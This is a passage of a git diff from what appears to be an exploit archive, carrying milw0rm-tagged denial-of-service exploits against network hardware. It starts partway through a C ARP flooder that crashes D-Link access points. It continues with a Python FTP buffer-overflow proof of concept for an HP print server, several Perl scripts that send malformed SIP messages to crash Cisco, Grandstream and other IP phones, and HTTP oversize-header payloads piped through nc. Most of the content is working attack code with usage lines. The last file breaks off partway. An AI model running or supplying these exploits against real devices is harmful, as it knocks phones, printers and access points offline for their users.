+ if (ioctl(fd, SIOCGIFADDR, (char*)&ifr) == -1)goto bad;
+
+ if (ifr.ifr_ifru.ifru_addr.sa_family == AF_INET) {
+ //save addr
+ iface->ipaddr=((struct sockaddr_in *)&ifr.ifr_ifru.ifru_addr)->sin_addr.s_addr;
+
+ //get netmask
+ if(ioctl(fd, SIOCGIFNETMASK, (char*)&ifr) == -1)goto bad;
+ iface->netmask=((struct sockaddr_in *)&ifr.ifr_ifru.ifru_netmask)->sin_addr.s_addr;
+
+ //get index
+ if (ioctl(fd, SIOCGIFINDEX, (char*)&ifr) == -1)goto bad;
+ iface->index=ifr.ifr_ifindex;
+
+ //get link-type
+ if(ioctl(fd, SIOCGIFHWADDR, (char*)&ifr) == -1)goto bad;
+ switch (ifr.ifr_hwaddr.sa_family) {
+ //__linux__ encaps loop in eth frames
+ case ARPHRD_LOOPBACK:
+ case ARPHRD_ETHER:
+ case ARPHRD_METRICOM:
+ iface->type = DLT_EN10MB;
+ iface->l2hdr_size=ETHHDR_SIZE;
+ break;
+ case ARPHRD_PPP:
+ default:
+ goto bad;
+ }
+ }else goto bad;
+ //get MTU
+ if(ioctl(fd, SIOCGIFMTU, &ifr) == -1)goto bad;
+ iface->mtu=ifr.ifr_mtu;
+ }
+
+ close(fd);
+ return 1;
+
+ bad:
+ close(fd);
+ printf("%s\n","getting interface infos");
+ exit(5);
+ }
+
+
+int write_link(struct intf *iface,u_char *frame, u_int size){
+ int c;
+ struct sockaddr_ll sa;
+
+ memset(&sa, 0, sizeof (sa));
+
+ sa.sll_family = AF_PACKET;
+ sa.sll_ifindex = iface->index;
+ sa.sll_protocol = htons(ETH_P_ALL);
+
+ c = sendto(iface->fd, frame, size, 0, (struct sockaddr *)&sa, sizeof (sa));
+
+ if (c != size){
+ printf("error writing to bpf,, written:%d bytes\n",c);
+ exit(6);
+ }
+ return (c);
+}
+
+
+
+int open_link(char *ifname){
+ struct ifreq ifr;
+ int n = 1,fd;
+
+
+ fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+
+ if (fd == -1){
+ printf("opening link %s",ifname);
+ exit(7);
+ }
+
+ memset(&ifr, 0, sizeof (ifr));
+
+ SSTRNCPY(ifr.ifr_name,ifname,sizeof (ifr.ifr_name));
+
+ if (ioctl(fd, SIOCGIFHWADDR, &ifr) < 0 ){
+ printf("%s\n","SIOCGIFHWADDR");
+ exit(7);
+ }
+
+
+#ifdef SO_BROADCAST
+/*
+ * man 7 socket
+ *
+ * Set or get the broadcast flag. When enabled, datagram sockets
+ * receive packets sent to a broadcast address and they are allowed
+ * to send packets to a broadcast address. This option has no
+ * effect on stream-oriented sockets.
+ */
+ if (setsockopt(fd, SOL_SOCKET, SO_BROADCAST, &n, sizeof(n)) == -1){
+ printf("set sock opt: SO_BROADCAST");
+ exit(7);
+ }
+
+#endif /* SO_BROADCAST */
+
+ return fd;
+
+
+}
+
+
+
+ #endif //linux
+
+
+void adv(){
+
+ printf( "D-LINK DWL-2000AP+ with firmware version 2.11 is prone to two remote denial\n\
+of service vulnerability because it fails to handle arp flooding. \n\
+The first vuln causes the wireless link (802.11) to be resetted and the arp \n\
+table to be rebuilded. All clients connected to the AP are disconnected.\n\
+This bug can be triggered by sending lots of arp replies through the wired link\n\
+or the radio one at a very high speed.\n\
+The second vulnerability affects the wireless link only and are quite harder\n\
+to trigger but causes the AP firmware to crash making a manual reboot mandatory.\n\
+This bug can be triggered only if no other D-LINK ethernet products are visible \n\
+to AP, if wep encryption is enabled and it needs a very large amount of\n\
+arp-requests to be broadcasted through its wireless link at a very high speed. \n\
+This exploit works in the 90%% of cases because sometimes the AP is able to ban\n\
+the flooding client before the exploiting process is complete.\n\
+D-LINK doesn't support this product anymore so no solution is available.\n\
+Other products can be vulnerable.\n\
+\n\
+Not vulnerable: DWL-700AP\n\n");
+
+
+ exit(0);
+}
+
+void info(char *pname){
+ printf( "\nThis program has been written to audit some D-LINK ethernet products\n"
+ "cuz it seems that some D-LINK AP will freeze if arp flooded\n\n"
+ "At the this time only D-LINK DWL-2000AP+ is reported to be vulnerable so\n"
+ "a good idea is to test other products...\n\n"
+ "Test 1: it makes the AP to disconnect all connected clients\n"
+ " a quik flood with arp-replies is sufficent to trigger this vuln\n"
+ " %s REPLY en1 @ @ 10.0.0.140 900000 0 00:de:09:a1:bb:c7\n\n"
+ "Test 2: it makes the AP firmware to crash making a manual reboot mandatory\n"
+ " a flood with a large amount of arp-requests\n"
+ " %s REQ en1 @ @ 10.0.0.140 9000000 0\n"
+ ,pname,pname);
+
+ exit(0);
+}
+
+
+void usage(char *pname){
+ printf( "usage:\n %s info or advisory \nor\n %s []\n"
+ "if srcMAC or srcIP is equal to '@' your own MAC/IP address will be used\n"
+ ,pname,pname);
+ exit(0);
+
+}
+
+
+
+main(int argc, char **argv){
+
+ int pktnr,a,c,ftype,err,delay;
+ u_char *srcmac,dstmac[6];
+ u_int32_t srcip,dstip;
+ char *inv;
+
+ if( argc < 2 )usage(argv[0]);
+ if(*argv[1]=='i')info(argv[0]);
+ if(*argv[1]=='a')adv();
+ if(argc < ( (!strcmp(argv[1],"REQ")) ? 8 : 9 ) ) usage(argv[0]);
+
+ if(!getifinfo(argv[2],&out_intf)){
+ printf("error opening interface %s\n",argv[2]);
+ exit(2);
+ }
+
+
+
+
+ out_intf.fd=open_link(out_intf.name);
+
+
+
+ printf("ARP FLOODER v0.1 by poplix - poplix@papuasia.org - 2006-12-09\n"
+ "written in a very few hours by taking pieces of code from some of mine ancient projects\n\n"
+ "\nflooding on %s, ",argv[2]);
+
+
+ if(!strcmp(argv[1],"REQ")){
+ printf("flood type: REQ, ");
+ ftype=FTYPE_REQ;
+ } else {
+ printf("flood type: REPLY, ");
+ ftype=FTYPE_REPLY;
+ }
+
+ if(*argv[3] != '@'){
+ SMALLOC(srcmac,u_char);
+ if(!str_to_macaddr(argv[3],srcmac)){
+ printf("\nerror while parsing srcmac: %s\n",argv[3]);
+ exit(2);
+ }
+ } else
+ srcmac=out_intf.l2addr;
+
+ printf(" srcMAC: %s, ",macaddr_to_str(srcmac));
+
+
+ if(ftype== FTYPE_REPLY && !str_to_macaddr(argv[8],dstmac)){
+ printf("\nerror while parsing dstmac: %s\n",argv[8]);
+ exit(2);
+ }
+ if(ftype==FTYPE_REPLY)
+ printf("dstMAC: %s, ",argv[8]);
+
+
+ if(*argv[4] != '@'){
+ ip_to_int(argv[4],&err);
+ if(err){
+ printf("\nerror while parsing srcip: %s\n",argv[4]);
+ exit(2);
+ }
+ } else
+ srcip=out_intf.ipaddr;
+ printf("srcIP: %s, ",int_to_ip(srcip));
+
+
+ dstip=ip_to_int(argv[5],&err);
+ if(err){
+ printf("\nerror while parsing dstip: %s\n",argv[5]);
+ exit(2);
+ }
+ printf("dstIP: %s, ",argv[5]);
+
+
+
+ pktnr=strtoul(argv[6],&inv,10);
+ if(*inv != 0){
+ printf("\nerror while parsing pkts number: %s\n",argv[6]);
+ exit(1);
+ }
+ printf("pkts: %u, ",pktnr);
+
+
+ delay=(strtoul(argv[7],&inv,10) * 1000);
+ if(*inv != 0){
+ printf("\nerror while parsing delay: %s\n",argv[6]);
+ exit(1);
+ }
+ printf("delay: %u ms\n",delay/1000);
+ printf("\nflooding...\n> 0");
+ fflush(stdout);
+
+
+ for(a=0;a0 && (a%128) == 0) ){
+ printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b> %u",a);
+ fflush(stdout);
+ }
+ if(ftype==FTYPE_REQ)
+ arp_request(dstip,srcip,srcmac);
+ else
+ arp_reply(dstip,dstmac,srcip,srcmac);
+
+ if(delay>0)usleep(delay);
+ }
+
+ printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b> %u",pktnr);
+ printf("\ndone\n");
+ close(out_intf.fd);
+ exit(0);
+}
+
+// milw0rm.com [2006-12-11]
diff --git a/platforms/hardware/dos/2961.py b/platforms/hardware/dos/2961.py
index da43ba927..3797e8a23 100755
--- a/platforms/hardware/dos/2961.py
+++ b/platforms/hardware/dos/2961.py
@@ -1,60 +1,60 @@
-#!/usr/bin/python
-
-import sys
-from ftplib import FTP
-
-print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
-print "Copyright (c) Joxean Koret"
-print
-
-if len(sys.argv) == 1:
- print "Usage: %s " % sys.argv[0]
- sys.exit(0)
-
-target = sys.argv[1]
-
-print "[+] Running attack against " + target
-
-try:
- ftp = FTP(target)
-except:
- print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
- sys.exit(0)
-try:
- msg = ftp.login() # Login anonymously
- print msg
-except:
- print "[!] Error logging anonymously.",sys.exc_info()[1]
- sys.exit(0)
-
-buf = "./A"
-iMax = 9
-
-for i in range(iMax):
- buf += buf
-
-print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "
-
-try:
- print "[+] Please, note that sometimes your connection will not be dropped. "
- ftp.retrlines("LIST " + buf[0:3000])
- print "[!] Exploit doesn't work :("
- print
- sys.exit(0)
-except:
- print "[+] Apparently exploit works. Verifying ... "
- print sys.exc_info()[1]
-
-ftp2 = FTP(target)
-
-try:
- msg = ftp2.login()
- print "[!] No, it doesn't work :( "
- print
- print msg
- sys.exit(0)
-except:
- print "[+] Yes, it works."
- print sys.exc_info()[1]
-
-# milw0rm.com [2006-12-19]
+#!/usr/bin/python
+
+import sys
+from ftplib import FTP
+
+print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
+print "Copyright (c) Joxean Koret"
+print
+
+if len(sys.argv) == 1:
+ print "Usage: %s " % sys.argv[0]
+ sys.exit(0)
+
+target = sys.argv[1]
+
+print "[+] Running attack against " + target
+
+try:
+ ftp = FTP(target)
+except:
+ print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
+ sys.exit(0)
+try:
+ msg = ftp.login() # Login anonymously
+ print msg
+except:
+ print "[!] Error logging anonymously.",sys.exc_info()[1]
+ sys.exit(0)
+
+buf = "./A"
+iMax = 9
+
+for i in range(iMax):
+ buf += buf
+
+print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "
+
+try:
+ print "[+] Please, note that sometimes your connection will not be dropped. "
+ ftp.retrlines("LIST " + buf[0:3000])
+ print "[!] Exploit doesn't work :("
+ print
+ sys.exit(0)
+except:
+ print "[+] Apparently exploit works. Verifying ... "
+ print sys.exc_info()[1]
+
+ftp2 = FTP(target)
+
+try:
+ msg = ftp2.login()
+ print "[!] No, it doesn't work :( "
+ print
+ print msg
+ sys.exit(0)
+except:
+ print "[+] Yes, it works."
+ print sys.exc_info()[1]
+
+# milw0rm.com [2006-12-19]
diff --git a/platforms/hardware/dos/3526.pl b/platforms/hardware/dos/3526.pl
index 30226c23c..10d14eda0 100755
--- a/platforms/hardware/dos/3526.pl
+++ b/platforms/hardware/dos/3526.pl
@@ -1,66 +1,66 @@ -#!/usr/bin/perl -# Title: Cisco 7940 SIP INVITE remote DOS -# Date: February 19, 2007 -# ID: KIPH2 -# -# Synopsis: After sending a cra fted INVITE message the device immediately -# reboots. The phone does not check properly the sipURI field of the -# Remote-Party-ID in the message. -# -# The vendor was informed and acknowledged the vulnerability. This -# vulnerability was identified by the Madynes research team at INRIA -# Lorraine, using the Madynes VoIP fuzzer. -# -# Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol -# for VoIP signalization. SIP is an ASCII based INVITE message is used to -# initiate and maintain a communication session. -# -# Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00 -# -# Unaffected: devices running firmware POS8-6-0 -# -# Description: After receiving one crafted SIP INVITE message, the -# affected device reboots immediately. The proof of concept code can be -# used to demonstrate the vulnerability. -# -# Resolution: -# -# Fixed software is available from the vendor and customers following -# recommended best practices (ie segregating VOIP traffic from data) will -# be protected from malicious traffic in most situations. -# -# Credits: -# -# Humberto J. Abdelnur (Ph.D Student) -# -# Radu State (Ph.D) -# -# Olivier Festor (Ph.D) -# -# This vulnerability was identified by the Madynes research team at INRIA -# -# Lorraine, using the Madynes VoIP fuzzer. 
-# -# http://madynes.loria.fr/ - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[2]); - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - -Proto=>'udp', - -PeerAddr=>$ARGV[0]); - - -$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP -192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla -\@192.168.1.2;tag=qwzng\r\nTo: \r -\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r -\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-03-20] +#!/usr/bin/perl +# Title: Cisco 7940 SIP INVITE remote DOS +# Date: February 19, 2007 +# ID: KIPH2 +# +# Synopsis: After sending a cra fted INVITE message the device immediately +# reboots. The phone does not check properly the sipURI field of the +# Remote-Party-ID in the message. +# +# The vendor was informed and acknowledged the vulnerability. This +# vulnerability was identified by the Madynes research team at INRIA +# Lorraine, using the Madynes VoIP fuzzer. +# +# Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol +# for VoIP signalization. SIP is an ASCII based INVITE message is used to +# initiate and maintain a communication session. +# +# Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00 +# +# Unaffected: devices running firmware POS8-6-0 +# +# Description: After receiving one crafted SIP INVITE message, the +# affected device reboots immediately. The proof of concept code can be +# used to demonstrate the vulnerability. +# +# Resolution: +# +# Fixed software is available from the vendor and customers following +# recommended best practices (ie segregating VOIP traffic from data) will +# be protected from malicious traffic in most situations. +# +# Credits: +# +# Humberto J. Abdelnur (Ph.D Student) +# +# Radu State (Ph.D) +# +# Olivier Festor (Ph.D) +# +# This vulnerability was identified by the Madynes research team at INRIA +# +# Lorraine, using the Madynes VoIP fuzzer. 
+# +# http://madynes.loria.fr/ + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[2]); + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + +Proto=>'udp', + +PeerAddr=>$ARGV[0]); + + +$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP +192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla +\@192.168.1.2;tag=qwzng\r\nTo: \r +\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r +\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n"; + +$socket->send($msg); + +# milw0rm.com [2007-03-20] diff --git a/platforms/hardware/dos/3535.pl b/platforms/hardware/dos/3535.pl index a450357fb..9ab120d8f 100755 --- a/platforms/hardware/dos/3535.pl +++ b/platforms/hardware/dos/3535.pl 
@@ -1,85 +1,85 @@ -#!/usr/bin/perl -# MADYNES Security Advisory -# http://madynes.loria.fr -# -# Title: Grandstream Budge Tone-200 denial of service vulnerability -# -# Release Date: 21/03/2007 -# -# Severity: High - Denial of Service -# -# Advisory ID:KIPH3 -# -# Hardware: Grandstream Budge Tone-200 IP Phone -# http://www.grandstream.com/consumerphones.html -# -# Affected Versions: Program-- 1.1.1.14 Bootloader-- 1.1.1.5 -# -# Other versions maybe. -# -# Vulnerability Synopsis: After sending a crafted INVITE/CANCE or any -# message with a "WWW-Authenticate" where the "Digest domain" is crafted -# the device freezes provoking a DoS. -# -# Impact: A remote individual can remotely crash and perform a Denial of -# Service(DoS) attack in all the services provided by the software by -# sending one crafted SIP INVITE message. This is conceptually similar to -# the "ping of death". -# -# Resolution: The vendor was contacted at multiple times, the complete -# report was sent, but no feedback whatsoever resulted. -# -# Vulnerability Description: the device reboots after a crafted INVITE -# message had been sent. -# -# Configuration of our device: -# -# Software Version: Program-- 1.1.1.14 Bootloader-- 1.1.1.5 -# -# IP-Address obtained by DHCP as 192.168.1.105 -# -# The configuration is the default -# -# Vulnerability: -# -# After sending a crafted INVITE, CANCEL or any message with a -# "WWW-Authenticate" where the "Digest domain" is crafted the device -# freezes provoking a DoS. -# -# Credits: -# Humberto J. Abdelnur (Ph.D Student) -# Radu State (Ph.D) -# Olivier Festor (Ph.D) -# This vulnerability was identified by the Madynes research team at INRIA -# Lorraine, using the Madynes VoIP fuzzer. 
-# http://madynes.loria.fr/ -# Exploit: -# -# To run the exploit the file invite_grandstream.pl should be launched -# (assuming our configurations) as: -# -# perl invite_grandstream.pl 192.168.1.105 5060 Fosforito -# -# Proof of Concept Code: - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[2]); - - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - - -$AUTH = "WWW-Authenticate: Digest domain=\"/-+:\@=\$\%D6\$;\$=;=\$=\$,\@\$.=;\@;;,&&+:::=\@/2\$&;6+;+=\%A5==;\@:=;\$&\%A3:u,\@=\@;&;\@+::+&;+,,&/&\@=,;=&:&,=&:;:;;K+&\@=\%DA*\$;\@&+&:;/==\%37:\%A6;,\@\%ED,:=:\@,;\%DA;&\$)\$+=;+:\%FE\$:\@;&=,W;,g\%EF;\%FB:+\@O\$+\%AF+;+:,&=\%CA\%EA;\$,\@+/;\@,-;:;,P&\@;_\$:\%C7&+&/!,\%EE\$:,\@:;;\@&\@,+,z\@\$;\@\@\$\$::\@/=,\$3\%ED=\@+\%AE/=&\@;;\$;&\$\%FE:\@;\$+:\$\%EB\$=&:;&K&;:\@\%EA,=\%BA6\%21;=&:\$\"\r\n"; - -$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=z9hG4bK056a27e7;rport\r\nFrom: ;tag=as011d1185\r\nTo: ;$TOTAG\r\n$AUTH\CSeq: 6106 INVITE\r\Max-Forwards: 70\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-03-21] +#!/usr/bin/perl +# MADYNES Security Advisory +# http://madynes.loria.fr +# +# Title: Grandstream Budge Tone-200 denial of service vulnerability +# +# Release Date: 21/03/2007 +# +# Severity: High - Denial of Service +# +# Advisory ID:KIPH3 +# +# Hardware: Grandstream Budge Tone-200 IP Phone +# http://www.grandstream.com/consumerphones.html +# +# Affected Versions: Program-- 1.1.1.14 Bootloader-- 1.1.1.5 +# +# Other versions maybe. +# +# Vulnerability Synopsis: After sending a crafted INVITE/CANCE or any +# message with a "WWW-Authenticate" where the "Digest domain" is crafted +# the device freezes provoking a DoS. +# +# Impact: A remote individual can remotely crash and perform a Denial of +# Service(DoS) attack in all the services provided by the software by +# sending one crafted SIP INVITE message. 
This is conceptually similar to +# the "ping of death". +# +# Resolution: The vendor was contacted at multiple times, the complete +# report was sent, but no feedback whatsoever resulted. +# +# Vulnerability Description: the device reboots after a crafted INVITE +# message had been sent. +# +# Configuration of our device: +# +# Software Version: Program-- 1.1.1.14 Bootloader-- 1.1.1.5 +# +# IP-Address obtained by DHCP as 192.168.1.105 +# +# The configuration is the default +# +# Vulnerability: +# +# After sending a crafted INVITE, CANCEL or any message with a +# "WWW-Authenticate" where the "Digest domain" is crafted the device +# freezes provoking a DoS. +# +# Credits: +# Humberto J. Abdelnur (Ph.D Student) +# Radu State (Ph.D) +# Olivier Festor (Ph.D) +# This vulnerability was identified by the Madynes research team at INRIA +# Lorraine, using the Madynes VoIP fuzzer. +# http://madynes.loria.fr/ +# Exploit: +# +# To run the exploit the file invite_grandstream.pl should be launched +# (assuming our configurations) as: +# +# perl invite_grandstream.pl 192.168.1.105 5060 Fosforito +# +# Proof of Concept Code: + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[2]); + + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + + +$AUTH = "WWW-Authenticate: Digest domain=\"/-+:\@=\$\%D6\$;\$=;=\$=\$,\@\$.=;\@;;,&&+:::=\@/2\$&;6+;+=\%A5==;\@:=;\$&\%A3:u,\@=\@;&;\@+::+&;+,,&/&\@=,;=&:&,=&:;:;;K+&\@=\%DA*\$;\@&+&:;/==\%37:\%A6;,\@\%ED,:=:\@,;\%DA;&\$)\$+=;+:\%FE\$:\@;&=,W;,g\%EF;\%FB:+\@O\$+\%AF+;+:,&=\%CA\%EA;\$,\@+/;\@,-;:;,P&\@;_\$:\%C7&+&/!,\%EE\$:,\@:;;\@&\@,+,z\@\$;\@\@\$\$::\@/=,\$3\%ED=\@+\%AE/=&\@;;\$;&\$\%FE:\@;\$+:\$\%EB\$=&:;&K&;:\@\%EA,=\%BA6\%21;=&:\$\"\r\n"; + +$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=z9hG4bK056a27e7;rport\r\nFrom: ;tag=as011d1185\r\nTo: ;$TOTAG\r\n$AUTH\CSeq: 6106 INVITE\r\Max-Forwards: 70\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); 
+
+# milw0rm.com [2007-03-21]
diff --git a/platforms/hardware/dos/358.txt b/platforms/hardware/dos/358.txt
index 2fbf379b1..fa906063f 100755
--- a/platforms/hardware/dos/358.txt
+++ b/platforms/hardware/dos/358.txt
@@ -1,3 +1,3 @@
-GET / HTTP/1.0\r\n /Host:AAAAAA[1024].
-
-# milw0rm.com [2004-07-22]
+GET / HTTP/1.0\r\n /Host:AAAAAA[1024].
+
+# milw0rm.com [2004-07-22]
diff --git a/platforms/hardware/dos/363.txt b/platforms/hardware/dos/363.txt
index 6b60d2420..cc46ef3ea 100755
--- a/platforms/hardware/dos/363.txt
+++ b/platforms/hardware/dos/363.txt
@@ -1,5 +1,5 @@
 $ $victima="ip.victim"
 $ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$victima"'\r\nAuthorization:
-Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80
-
-# milw0rm.com [2004-07-22]
+Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80
+
+# milw0rm.com [2004-07-22]
diff --git a/platforms/hardware/dos/3791.pl b/platforms/hardware/dos/3791.pl
index 62e43cbf4..95d0f5bee 100755
--- a/platforms/hardware/dos/3791.pl
+++ b/platforms/hardware/dos/3791.pl
@@ -1,47 +1,47 @@
-#!/usr/bin/perl
-
-use IO::Socket::INET;
-
-die "Usage $0 " unless ($ARGV[2]);
-
-
-
-$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
-
- Proto=>'udp',
-
- PeerAddr=>$ARGV[0]);
-
-
-
-
-
-$msg =
-
-"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r
-
-Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r
-
-Max-Forwards: 70\377\r
-
-To: lynksys \377\r
-
-From: ;tag=00\377\r
-
-Call-ID: tucu\@192.168.1.2\377\r
-
-CSeq: 24865 INVITE\377\r
-
-Contact: \377\r
-
-Supported: 100rel\377\r
-
-Content-Length: 0\377\r
-
-\r\n";
-
-
-
-$socket->send($msg);
-
-# milw0rm.com [2007-04-24]
+#!/usr/bin/perl
+
+use IO::Socket::INET;
+
+die "Usage $0 " unless ($ARGV[2]);
+
+
+
+$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
+
+ Proto=>'udp',
+
+ PeerAddr=>$ARGV[0]);
+
+
+
+
+
+$msg =
+
+"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r
+
+Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r
+
+Max-Forwards: 70\377\r
+
+To: lynksys \377\r
+
+From: ;tag=00\377\r
+
+Call-ID: tucu\@192.168.1.2\377\r
+
+CSeq: 24865 INVITE\377\r
+
+Contact: \377\r
+
+Supported: 100rel\377\r
+
+Content-Length: 0\377\r
+
+\r\n";
+
+
+
+$socket->send($msg);
+
+# milw0rm.com [2007-04-24]
diff --git a/platforms/hardware/dos/3792.pl b/platforms/hardware/dos/3792.pl
index 50b83e264..8d9b62139 100755
--- a/platforms/hardware/dos/3792.pl
+++ b/platforms/hardware/dos/3792.pl
@@ -1,89 +1,89 @@ -#!/usr/bin/perl - - - -use IO::Socket; - - - -#die "Usage $0 " unless ($ARGV[2]); - -die "Usage $0 " unless ($ARGV[0]); - - - -my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp'); - -$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061'); - - - -$touser=$ARGV[0]; - -$target=$ARGV[1]; - -$sourceaddress=$ARGV[2]; - -$sourceport=$ARGV[3]; - -$high=2000; - -$low=1; - -$fromuserid = int(rand( $high-$low+1 ) ) + $low; - -my $cseq = "INVITE"; - - - -$msg = "INVITE sip:$touser\@$target SIP/2.0\r - -Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r - -From: \377;tag=779\r - -To: Receiver \r - -Call-ID: 10\@$sourceaddress\r - -CSeq: 1 $cseq\r - -Contact: 779 \r - -Expires: 1200\r - -Max-Forwards: 70\r - -Content-Type: application/sdp\r - -Content-Length: 133\r - -\r - -v=0\r - -o=0 0 0 IN IP4 $sourceaddress\r - -s=Session SDP\r - -c=IN IP4 $sourceaddress\r - -t=0 0\r - -m=audio 9876 RTP/AVP 0\r - -a=rtpmap:0 PCMU/8000\r"; - - - -$sock or die "no socket :$!"; - -while (1){ - - $socket->send($msg); - - sleep 90; - - } - -# milw0rm.com [2007-04-24] +#!/usr/bin/perl + + + +use IO::Socket; + + + +#die "Usage $0 " unless ($ARGV[2]); + +die "Usage $0 " unless ($ARGV[0]); + + + +my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp'); + +$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061'); + + + +$touser=$ARGV[0]; + +$target=$ARGV[1]; + +$sourceaddress=$ARGV[2]; + +$sourceport=$ARGV[3]; + +$high=2000; + +$low=1; + +$fromuserid = int(rand( $high-$low+1 ) ) + $low; + +my $cseq = "INVITE"; + + + +$msg = "INVITE sip:$touser\@$target SIP/2.0\r + +Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r + +From: \377;tag=779\r + +To: Receiver \r + +Call-ID: 10\@$sourceaddress\r + +CSeq: 1 $cseq\r + +Contact: 779 \r + 
+Expires: 1200\r + +Max-Forwards: 70\r + +Content-Type: application/sdp\r + +Content-Length: 133\r + +\r + +v=0\r + +o=0 0 0 IN IP4 $sourceaddress\r + +s=Session SDP\r + +c=IN IP4 $sourceaddress\r + +t=0 0\r + +m=audio 9876 RTP/AVP 0\r + +a=rtpmap:0 PCMU/8000\r"; + + + +$sock or die "no socket :$!"; + +while (1){ + + $socket->send($msg); + + sleep 90; + + } + +# milw0rm.com [2007-04-24] diff --git a/platforms/hardware/dos/4297.pl b/platforms/hardware/dos/4297.pl index 8239daeb4..fa469c504 100755 --- a/platforms/hardware/dos/4297.pl +++ b/platforms/hardware/dos/4297.pl 
@@ -1,36 +1,36 @@
-#!/usr/bin/perl
-use IO::Socket::INET;
-
-die "Usage $0 " unless ($ARGV[2]);
-
-
-
-$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
-
- Proto=>'udp',
-
- PeerAddr=>$ARGV[0]);
-
-
-
-$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";;
-
-$socket->send($msg);
-
-
-
-sleep(1);
-
-$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";
-
-$socket->send($msg);
-
-
-
-sleep(1);
-
-$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: ;tag=02\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n";
-
-$socket->send($msg);
-
-# milw0rm.com [2007-08-21]
+#!/usr/bin/perl
+use IO::Socket::INET;
+
+die "Usage $0 " unless ($ARGV[2]);
+
+
+
+$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
+
+ Proto=>'udp',
+
+ PeerAddr=>$ARGV[0]);
+
+
+
+$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";;
+
+$socket->send($msg);
+
+
+
+sleep(1);
+
+$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";
+
+$socket->send($msg);
+
+
+
+sleep(1);
+
